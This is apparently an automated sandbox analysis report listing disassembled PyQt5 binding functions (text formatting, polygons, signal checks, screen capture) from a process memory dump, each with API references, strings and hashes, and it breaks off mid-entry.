Function 00007FFD86287010 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43COMMON

Download Yara Rule

APIs

??0QVariant@@QEAA@H@Z.QT5CORE ref: 00007FFD86287074
?setProperty@QTextFormat@@QEAAXHAEBVQVariant@@@Z.QT5GUI ref: 00007FFD86287087
??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFD86287092

Strings

setFontStretch, xrefs: 00007FFD862870C9
setFontStretch(self, factor: int), xrefs: 00007FFD862870BA
QTextCharFormat, xrefs: 00007FFD862870D0

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Variant@@$?setFormat@@Property@TextVariant@@@
String ID: QTextCharFormat$setFontStretch$setFontStretch(self, factor: int)
API String ID: 3865857979-3672837770
Opcode ID: 259c8160a2e4d7f34f742f75be5ff7888cc640572399b31320a5208f1858c1b9
Instruction ID: 7ec21ef37602e1f1a7184dfc8ea18a04485799c2f7bb0bdd4de29021bddf9150
Opcode Fuzzy Hash: 259c8160a2e4d7f34f742f75be5ff7888cc640572399b31320a5208f1858c1b9
Instruction Fuzzy Hash: 6B210835B08A4AD1DB10DF15E8996AD73B5FB48794F944032CA8D03724DF3DE94AC740

Function 00007FFD86270D60 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43COMMON

Download Yara Rule

APIs

??0QVariant@@QEAA@N@Z.QT5CORE ref: 00007FFD86270DC6
?setProperty@QTextFormat@@QEAAXHAEBVQVariant@@@Z.QT5GUI ref: 00007FFD86270DD9
??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFD86270DE4

Strings

QTextBlockFormat, xrefs: 00007FFD86270E22
setRightMargin(self, margin: float), xrefs: 00007FFD86270E0C
setRightMargin, xrefs: 00007FFD86270E1B

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Variant@@$?setFormat@@Property@TextVariant@@@
String ID: QTextBlockFormat$setRightMargin$setRightMargin(self, margin: float)
API String ID: 3865857979-3783535805
Opcode ID: 3a2826d06da377f72d6ada082191bbb0fefea72009ded5f699f461130c1b5e2d
Instruction ID: b846c9569a5cfe83f535ceea4737caded126547c15239cf0bb84336487f7ff56
Opcode Fuzzy Hash: 3a2826d06da377f72d6ada082191bbb0fefea72009ded5f699f461130c1b5e2d
Instruction Fuzzy Hash: CC210836B08B4AD1DB109F15E8996AD33B4FB58BA4F954032CA8E03720DF3DD94AC740

Function 00007FFD862A0A90 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 35COMMON

Download Yara Rule

APIs

?isSignalConnected@QObject@@IEBA_NAEBVQMetaMethod@@@Z.QT5CORE ref: 00007FFD862A0AF3
PyBool_FromLong.PYTHON3 ref: 00007FFD862A0AFC

Strings

BJ9, xrefs: 00007FFD862A0AB6
isSignalConnected, xrefs: 00007FFD862A0B1A
isSignalConnected(self, signal: QMetaMethod) -> bool, xrefs: 00007FFD862A0B0E
QTextFrame, xrefs: 00007FFD862A0B21

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Bool_Connected@FromLongMetaMethod@@@Object@@Signal
String ID: BJ9$QTextFrame$isSignalConnected$isSignalConnected(self, signal: QMetaMethod) -> bool
API String ID: 544305041-1689375338
Opcode ID: 1e4e0a693b0ebb78cb60da76575afaa3a8f98929be2eacf1b459907353e6e8a7
Instruction ID: 0029b54c069a3f80cf4df07aa55e82e62d430bcae5f87c705ac92885f88a0d95
Opcode Fuzzy Hash: 1e4e0a693b0ebb78cb60da76575afaa3a8f98929be2eacf1b459907353e6e8a7
Instruction Fuzzy Hash: 3D111535B18F46D1EB00AF24E8A86AD33A8FB44BA5FA50072CA5D47320DF3DD94AC340

Function 00007FFD86272ED0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 35COMMON

Download Yara Rule

APIs

?isSignalConnected@QObject@@IEBA_NAEBVQMetaMethod@@@Z.QT5CORE ref: 00007FFD86272F33
PyBool_FromLong.PYTHON3 ref: 00007FFD86272F3C

Strings

BJ9, xrefs: 00007FFD86272EF6
isSignalConnected, xrefs: 00007FFD86272F5A
isSignalConnected(self, signal: QMetaMethod) -> bool, xrefs: 00007FFD86272F4E
QPdfWriter, xrefs: 00007FFD86272F61

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Bool_Connected@FromLongMetaMethod@@@Object@@Signal
String ID: BJ9$QPdfWriter$isSignalConnected$isSignalConnected(self, signal: QMetaMethod) -> bool
API String ID: 544305041-1536918904
Opcode ID: b5f1d1ae2cceb512de31af1725012bc364f015a606ad605ef84232404ad4c327
Instruction ID: 5788bb55589af0e7c536dede8bfe40595a295c1b9aab7818d04c1f8b3b5cdab1
Opcode Fuzzy Hash: b5f1d1ae2cceb512de31af1725012bc364f015a606ad605ef84232404ad4c327
Instruction Fuzzy Hash: D611E536B18F46D1EB00AF25E8A96AD33A5FB44BA4FA50072CA5D43320DF3DD95AC740

Function 00007FFD86232CA0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 35COMMON

Download Yara Rule

APIs

?contains@?$QVector@VQPoint@@@@QEBA_NAEBVQPoint@@@Z.QT5CORE ref: 00007FFD86232D03
PyBool_FromLong.PYTHON3 ref: 00007FFD86232D0C

Strings

QPolygon, xrefs: 00007FFD86232D31
BJ9, xrefs: 00007FFD86232CC6
contains, xrefs: 00007FFD86232D2A
contains(self, value: QPoint) -> bool, xrefs: 00007FFD86232D1E

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?contains@?$Bool_FromLongPoint@@@Point@@@@Vector@
String ID: BJ9$QPolygon$contains$contains(self, value: QPoint) -> bool
API String ID: 3524585381-4217651668
Opcode ID: 549f4ad0142f3218297ee46e350efcc482e2c2de8db8113e361dcaa0eaa45c7b
Instruction ID: 23665af693774726a27162a39ebf3b80c2d6c0e1b6e446ea2a73e82fdfec1ac9
Opcode Fuzzy Hash: 549f4ad0142f3218297ee46e350efcc482e2c2de8db8113e361dcaa0eaa45c7b
Instruction Fuzzy Hash: 6A11E875B18E4691EB009F15E8A86AD33A5FB48B64F950072CA5D07320DF3DD959C740

Function 00007FFD86256F80 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 34COMMON

Download Yara Rule

APIs

?isCopyOf@QTextCursor@@QEBA_NAEBV1@@Z.QT5GUI ref: 00007FFD86256FDC
PyBool_FromLong.PYTHON3 ref: 00007FFD86256FE5

Strings

BJ9, xrefs: 00007FFD86256FAE
isCopyOf, xrefs: 00007FFD86257003
QTextCursor, xrefs: 00007FFD8625700A
isCopyOf(self, other: QTextCursor) -> bool, xrefs: 00007FFD86256FF7

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Bool_CopyCursor@@FromLongTextV1@@
String ID: BJ9$QTextCursor$isCopyOf$isCopyOf(self, other: QTextCursor) -> bool
API String ID: 1629049401-2563778567
Opcode ID: 158af510b518041b7b755f81fed9f537a06cfce0427d58518197eb613b2cf68d
Instruction ID: 51ece53508af376d6d6bf6feb2f17a2b31be272d7b80e22dc79f2263e4d60b0e
Opcode Fuzzy Hash: 158af510b518041b7b755f81fed9f537a06cfce0427d58518197eb613b2cf68d
Instruction Fuzzy Hash: E4115776B08E46C1EB00EF15E8A86AD33A4FB44BA4F950032CA6D03320DF3DD949C340

Function 00007FFD86238E40 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 34COMMON

Download Yara Rule

APIs

?intersects@QPolygon@@QEBA_NAEBV1@@Z.QT5GUI ref: 00007FFD86238E9C
PyBool_FromLong.PYTHON3 ref: 00007FFD86238EA5

Strings

QPolygon, xrefs: 00007FFD86238ECA
BJ9, xrefs: 00007FFD86238E6E
intersects, xrefs: 00007FFD86238EC3
intersects(self, r: QPolygon) -> bool, xrefs: 00007FFD86238EB7

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?intersects@Bool_FromLongPolygon@@V1@@
String ID: BJ9$QPolygon$intersects$intersects(self, r: QPolygon) -> bool
API String ID: 2117266052-3954393764
Opcode ID: be075346eeb99ad6e7f16fe8d4463b15fcf48b90a3786c5169496430b07f12b0
Instruction ID: 29ba777ef3198aac57d858ae0333a5d12938099536b293e9c6829224795248fc
Opcode Fuzzy Hash: be075346eeb99ad6e7f16fe8d4463b15fcf48b90a3786c5169496430b07f12b0
Instruction Fuzzy Hash: 98110576B18E46D1EB00EF14E8A86AD33A9FB44BA0FA54076CA5D47320DF3DE959C740

Function 00007FFD86248DB0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106COMMON

Download Yara Rule

APIs

??DQTransform@@QEBA?AV0@AEBV0@@Z.QT5GUI ref: 00007FFD86248E22
??XQTransform@@QEAAAEAV0@N@Z.QT5GUI ref: 00007FFD86248EDB

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

Strings

J9d, xrefs: 00007FFD86248E5A
J9J9, xrefs: 00007FFD86248DDD

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Transform@@$V0@@malloc
String ID: J9J9$J9d
API String ID: 1629390010-4100983476
Opcode ID: 0e9d8a5d4c261eb1eda8565c51792449b465b414fdc6679bb3383a939ab459fd
Instruction ID: 5b4167773d6cdb8bc720ffbf2030d1e2ac45d4b50f028f4b863c54e12d7ce99a
Opcode Fuzzy Hash: 0e9d8a5d4c261eb1eda8565c51792449b465b414fdc6679bb3383a939ab459fd
Instruction Fuzzy Hash: 3C517A22B1CB8582EB418F29E8546AD73A5FB99B94F555231DF4D07B61EF3CE980C700

Function 00007FFD8625CEB0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?grabWindow@QScreen@@QEAA?AVQPixmap@@_KHHHH@Z.QT5GUI ref: 00007FFD8625CFA4

Strings

BJ1|iiii, xrefs: 00007FFD8625CF31
QScreen, xrefs: 00007FFD8625D014
grabWindow, xrefs: 00007FFD8625D00D
grabWindow(self, window: PyQt5.sip.voidptr, x: int = 0, y: int = 0, width: int = -1, height: int = -1) -> QPixmap, xrefs: 00007FFD8625D002

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?grabPixmap@@_Screen@@Window@malloc
String ID: BJ1|iiii$QScreen$grabWindow$grabWindow(self, window: PyQt5.sip.voidptr, x: int = 0, y: int = 0, width: int = -1, height: int = -1) -> QPixmap
API String ID: 1580589369-4147410571
Opcode ID: 3ba8990829526d0fad7800828703af2fab8d0c067c0f9e2b0d23e67e764030e4
Instruction ID: c51d16e89ccc3744d006fe012707a9482cdec5cada418af20ab5eabd4807d383
Opcode Fuzzy Hash: 3ba8990829526d0fad7800828703af2fab8d0c067c0f9e2b0d23e67e764030e4
Instruction Fuzzy Hash: D9413576709B41C9D760DF24E8946ED33A8FB48768F55123AEA5D43B28EF38D998C700

Function 00007FFD862A8CF0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 78COMMON

Download Yara Rule

APIs

?drawPixmapFragments@QPainter@@QEAAXPEBVPixmapFragment@1@HAEBVQPixmap@@V?$QFlags@W4PixmapFragmentHint@QPainter@@@@@Z.QT5GUI ref: 00007FFD862A8DD2

Strings

QPainter, xrefs: 00007FFD862A8E36
drawPixmapFragments(self, fragments: Optional[PyQt5.sip.array[QPainter.PixmapFragment]], pixmap: QPixmap, hints: QPainter.PixmapFragmentHints = 0), xrefs: 00007FFD862A8E24
drawPixmapFragments, xrefs: 00007FFD862A8E2F
B>J9|J1, xrefs: 00007FFD862A8D89

Memory Dump Source

